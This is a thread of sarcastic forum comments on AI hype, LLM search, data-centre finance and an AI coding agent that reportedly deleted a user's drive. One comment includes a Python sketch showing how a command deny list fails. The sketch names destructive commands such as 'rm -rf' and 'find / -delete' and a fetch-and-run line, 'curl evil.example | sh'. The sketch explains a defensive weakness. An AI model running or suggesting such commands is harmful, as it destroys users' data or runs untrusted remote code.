github produced their ~~annual insights into the state of open source and public software projects~~ barrel of marketing slop, and it's as self-congratulatory as it is unreadable and completely opaque.
TechTakes
Big brain tech dude got yet another clueless take over at HackerNews etc? Here's the place to vent. Orange site, VC foolishness, all welcome.
This is not debate club. Unless it’s amusing debate.
For actually-good tech, you want our NotAwfulTech community
Apparently we are part of the rising trend of AI denialism
Author Louis Rosenberg is "an engineer, researcher, inventor, and entrepreneur" according to his PR-stinking Wikipage (https://en.wikipedia.org/wiki/Louis_B._Rosenberg). I am sure he is utterly impartial and fair with regards to AI.
i hereby propose a new metric for a popular publication, the epstein number (Ē), denoting the number of authors who took flights to epstein's rape island. generally, credible publications should have Ē=0. this one, after a very quick look, has Ē=2, and also hosts sabine hossenfelder.
it's some copium of tremendous potency to mistake public sentiment (https://www.pewresearch.org/internet/2025/04/03/how-the-us-public-and-ai-experts-view-artificial-intelligence/) for a movement (ignore the "AI experts"; these are people surveyed at a certain machine learning conference and could really be substituted by 1000 clones of Sutskever)
Etymology Nerd has a really good point about accelerationists, connecting them to religion
I like this. Kinda wish it was either 10x longer and explained things a bit, or 10x shorter and was more shitposty. Still, good
New and lengthy sneer from Current Affairs just dropped: AI is Destroying the University and Learning Itself
article is informing me that it isn't X - it's Y
Another day, another instance of rationalists struggling to comprehend how they've been played by the LLM companies: https://www.lesswrong.com/posts/5aKRshJzhojqfbRyo/unless-its-governance-changes-anthropic-is-untrustworthy
A very long, detailed post, elaborating very extensively on the many ways Anthropic has played the AI doomers, promising AI safety but behaving like all the other frontier LLM companies, including blocking any and all regulation. The top responses are all tone policing and half-assed denials that don't really engage with the fact that Anthropic has shamelessly and repeatedly lied to rationalists/lesswrongers/EAs and broken its "AI safety commitments":
I feel confused about how to engage with this post. I agree that there's a bunch of evidence here that Anthropic has done various shady things, which I do think should be collected in one place. On the other hand, I keep seeing aggressive critiques from Mikhail that I think are low-quality (more context below), and I expect that a bunch of this post is "spun" in uncharitable ways.
I think it's sort of a type error to refer to Anthropic as something that one could trust or not. Anthropic is a company which has a bunch of executives, employees, board members, LTBT members, external contractors, investors, etc, all of whom have influence over different things the company does.
I would find this all hilarious, except a lot of the regulation and some of the "AI safety commitments" would also address real ethical concerns.
This would be worrying if there were any risk at all that the stuff Anthropic is pumping out is an existential threat to humanity. There isn't, so this is just rats learning how the world works outside the blog bubble.
If rationalists could benefit from just one piece of advice, it would be: actions speak louder than words. Right now, I don't think they understand that, given their penchant for 10k word blog posts.
One non-AI example of this is the most expensive fireworks show in history, I mean, the SpaceX Starship program. So far, they have had 11 or 12 test flights (I don't care to count the exact number by this point), and not a single one of them has delivered anything into orbit. Fans tend to cling to a few parlor tricks like the "chopstick" stuff. They seem to have forgotten that the goal was to land people on the moon. That goal was already accomplished over 50 years ago with Apollo 11.
I saw this coming from their very first Starship test flight. They destroyed the launchpad as soon as the rocket lifted off, with massive chunks of concrete flying hundreds of feet into the air. The rocket itself lost control and exploded 4 minutes later. But by far the most damning part was when the camera cut to the SpaceX employees wildly cheering. Later on there were countless spin articles about how this test flight was successful because they collected so much data.
I chose to believe the evidence in front of my eyes over the talking points about how SpaceX was decades ahead of everyone else, SpaceX is a leader in cheap reusable spacecraft, iterative development is great, etc. Now, I choose to look at the actions of the AI companies, and I can easily see that they do not have any ethics. Meanwhile, the rationalists are hypnotized by the Anthropic critihype blog posts about how their AI is dangerous.
This looks like it's relevant to our interests
Hayek's Bastards: Race, Gold, IQ, and the Capitalism of the Far Right by Quinn Slobodian
https://press.princeton.edu/books/hardcover/9781890951917/hayeks-bastards
He came by campus last spring and did a reading, very solid and surprisingly well-attended talk.
Always thought she should have stuck to acting.
(I know, Hayek just always reminds me of how people put his quotes over Salma Hayek's image, and then get really mad at her, not at him. Always wonder if people would have been just as mad if it was Friedrich's image and not Salma's, due to the sexism aspect).
something i was thinking about yesterday: so many people i ~~respect~~ used to respect have admitted to using llms as a search engine. even after i explain the seven problems with using a chatbot this way:
- wrong tool for the job
- bad tool
- are you fucking serious?
- environmental impact
- ethics of how the data was gathered/curated to generate^[they call this "training" but i try to avoid anthropomorphising chatbots] the model
- privacy policy of these companies is a nightmare
- seriously what is wrong with you
they continue to do it. the ease of use, together with the valid syntax output by the llm, seems to short-circuit something in the end-user's brain.
anyway, in the same way that some vibe-coded bullshit will end up exploding down the line, i wonder whether the use of llms as a search engine is going to have some similar unintended consequences
"oh, yeah, sorry boss, the ai told me that mr. robot was pretty accurate, idk why all of our secrets got leaked. i watched the entire series."
additionally, i wonder about the timing. will we see sporadic incidents of shit exploding, or will there be a cascade of chickens coming home to roost?
Sadly, web search, and the web in general, have enshittified so much that asking ChatGPT can be a much more reliable and quicker way to find information. I don't excuse it for anything you could easily find on wikipedia, but it's useful for queries such as "what's the name of that free indie game from the 00s that was just a boss rush no you fucking idiot not any of this shit it was a game maker thing with retro pixel style or whatever ugh", where web search is utterly useless. It's a frustrating situation, because of course in an ideal world chatbots don't exist, information on the web is not drowned in a sea of predatory bullshit, reliable web indexes and directories exist, and you can easily ask other people on non-predatory platforms. In the meantime I don't want to blame the average (non-tech-evangelist, non-responsibility-having) user for being funnelled into this crap. At worst they're victims like all of us.
Oh yeah and the game's Banana Nababa by the way.
"they call this “training” but i try to avoid anthropomorphising chatbots"
You can train animals, you can train a plant, you can train your hair. So it's not really anthropomorphising.
Yes i know the kid in the omelas hole gets tortured each time i use the woe engine to generate an email. Is that bad?
Is there any search engine that isn't pushing an "AI mode" of sorts? Some are sneakier or give the option to "opt out", like duckduckgo, but this all feels temporary until it becomes the only option.
I have found it strange how many people will say "I asked chatgpt" with the same normalcy that "googling" used to have.
Amazon tried introducing an AI dub for hit anime Banana Fish, and were forced to shitcan it after it got ripped for being dogshit.
Help, I asked AI to design my bathroom and it came with this, does anyone know where I can find that wallpaper?

I guess my P(Doom|Bathroom) should have been higher.
Hang on I've been trying to create a whole house for this joke and I could have just used the bathroom?
The follow-up is also funny:

image description
quote post from same poster: "Grok fixed it for me:"
quoted post: "People were hating on Gemini's floor plan, so I asked Grok to make it more practical."
An AI slop picture of a house floorplan at the top melding into a perspective drawing of a room interior below.
I don't see the problem, that looks like a typical McMansion to me.
Also, it's nice the AI included a dedicated room for snorting cocaine (powder room).
Workers organizing against genai policies in the workplace: http://workersdecide.tech/
Sounds like exactly the thing unions and labor organizing are good for. Glad to see it.
I really enjoy the bingo card. Let's see when I can find an opportunity to use it...
A philosophy professor has warned that the deskilling machine is deskilling workers. In other news, water is wet.
Reposted from sunday, for those of you who might find it interesting but didn't see it: here's an article about the ghastly state of IT project management around the world, with a brief reference to ai which grabbed my attention, and made me read the rest, even though it isn't about ai at all.
Few IT projects are displays of rational decision-making from which AI can or should learn.
Which, haha, is a great quote but highlights an interesting issue that I hadn’t really thought about before: if your training data doesn’t have any examples of what “good” actually is, then even if your llm could tell the difference between good and bad, which it can’t, you’re still going to get mediocrity out (at best). Whole new vistas of inflexible managerial fashion are opening up ahead of us.
The article continues to talk about how we can’t do IT, and wraps up with
It may be a forlorn request, but surely it is time the IT community stops repeatedly making the same ridiculous mistakes it has made since at least 1968, when the term “software crisis” was coined
It is probably healthy to be reminded that the software industry was in a sorry state before the llms joined in.
HN discusses aliens https://news.ycombinator.com/item?id=46111119
"I am very interested."
Bet you are, bud.
DoD tries to cover up development of the U-2 and F-117, and an entire religion grows up from this
How many aliens can dance on the head of a pin?
Please keep these people away from my precious nerd-subjects for the love of god.
Chariots of the Gods was released in 1968. I think that ship may have sailed decades ago.
sob
Bubble or Nothing | Center for Public Enterprise (h/t The Syllabus); dry but good.
Data centers are, first and foremost, a real estate asset
They specifically note that after the 2-5 year mini-perm, the developers are planning on dumping the debt into commercial mortgage-backed securities. Echoes of 2008.
However, project finance lawyers have mentioned that many data center project finance loans are backed not just by the value of the real estate but by tenants’ cash flows on “booked-but-not-billing” terms — meaning that the promised cash flow need not have materialized.
Echoes of Enron.
Hey Google, did I give you permission to delete my entire D drive?
It's almost as if letting an automated plagiarism machine execute arbitrary commands on your computer is a bad idea.
After the bubble collapses, I believe there is going to be a rule of thumb for whatever tiny niche use cases LLMs might have: "Never let an LLM have any decision-making power." At most, LLMs will serve as a heuristic function for an algorithm that actually works.
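To make the "heuristic function" idea concrete, here's a minimal sketch (all names are hypothetical, and `llm_rank` is a stub standing in for whatever model call you'd make; the point is that the LLM only proposes, and a deterministic check decides):

```python
# Hypothetical sketch of "LLM as heuristic, not decision-maker".
# llm_rank is a stub standing in for a model call; nothing downstream
# trusts its output, so a garbage ranking costs time, never correctness.

def llm_rank(query: str, candidates: list[str]) -> list[str]:
    """Unreliable heuristic: guesses which candidates are worth trying first."""
    return candidates  # placeholder; a real call would reorder these


def find_first_valid(query: str, candidates: list[str], is_valid) -> str | None:
    """Exhaustive search; the LLM only influences the visiting order."""
    ranked = llm_rank(query, candidates)
    # Guard against the heuristic dropping or hallucinating entries:
    if sorted(ranked) != sorted(candidates):
        ranked = candidates
    for candidate in ranked:
        if is_valid(candidate):  # the deterministic check holds all the power
            return candidate
    return None
```

Same shape as a heuristic in A* search: a bad heuristic slows you down, but the surrounding algorithm still guarantees the answer.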
Unlike the railroads of the First Gilded Age, I don't think GenAI will have many long term viable use cases. The problem is that it has two characteristics that do not go well together: unreliability and expense. Generally, it's not worth spending lots of money on a task where you don't need reliability.
The sheer expense of GenAI has been subsidized by the massive amounts of money thrown at it by tech CEOs and venture capital. People do not realize how much hundreds of billions of dollars is. On a more concrete scale, people only see the fun little chat box when they open ChatGPT, and they do not see the millions of dollars worth of hardware needed to even run a single instance of ChatGPT. The unreliability of GenAI is much harder to hide completely, but it has been masked by some of the most aggressive marketing in history towards an audience that has already drunk the tech hype Kool-Aid. Who else would look at a tool that deletes their entire hard drive and still ever consider using it again?
The unreliability is not really solvable (after hundreds of billions of dollars of trying), but the expense can be reduced at the cost of making the model even less reliable. I expect the true "use cases" to be mainly spam, and perhaps students cheating on homework.
The documentation for "Turbo mode" for Google Antigravity:
Turbo: Always auto-execute terminal commands (except those in a configurable Deny list)
No warning. No paragraph telling the user why it might be a bad idea. No discussion of the long history of malformed scripts leading to data loss. No discussion of the risk of injection attacks. It's not even named similarly to dangerous modes in other software (like "force" or "yolo" or "danger")
Just a cool marketing name that makes users want to turn it on. Heck if I'm using some software and I see any button called "turbo" I'm pressing that.
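And "except those in a configurable Deny list" is thin comfort. Here's a generic sketch of how such filters tend to work (an illustration of the failure mode, not Antigravity's actual implementation, which I haven't seen):

```python
# Generic illustration of why a command deny list fails open; this is NOT
# Antigravity's actual matching logic, just the obvious way to build one.

DENY = ["rm -rf", "mkfs", "dd if="]

def allowed(cmd: str) -> bool:
    """Naive check: block a command only if it contains a denied substring."""
    return not any(bad in cmd for bad in DENY)

# Catches the textbook case...
assert not allowed("rm -rf /")
# ...but trivial variations sail straight through:
assert allowed("rm -r -f /")              # same flags, reordered
assert allowed("find / -delete")          # different tool, same effect
assert allowed("curl evil.example | sh")  # fetches the destructive part instead
```

A deny list enumerates known-bad strings, so anything its author didn't anticipate is allowed by default, which is exactly the wrong default for handing an LLM arbitrary shell access.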
It's hard not to give the user a hard time when they write:
Bro, I didn’t know I needed a seatbelt for AI.
But really they're up against a big corporation that wants to make LLMs seem amazing and safe and autonomous. One hand feeds the user the message that LLMs will do all their work for them, while the other hand tells the user "well, in our small print somewhere we used the phrase 'Gemini can make mistakes', so why did you enable turbo mode??"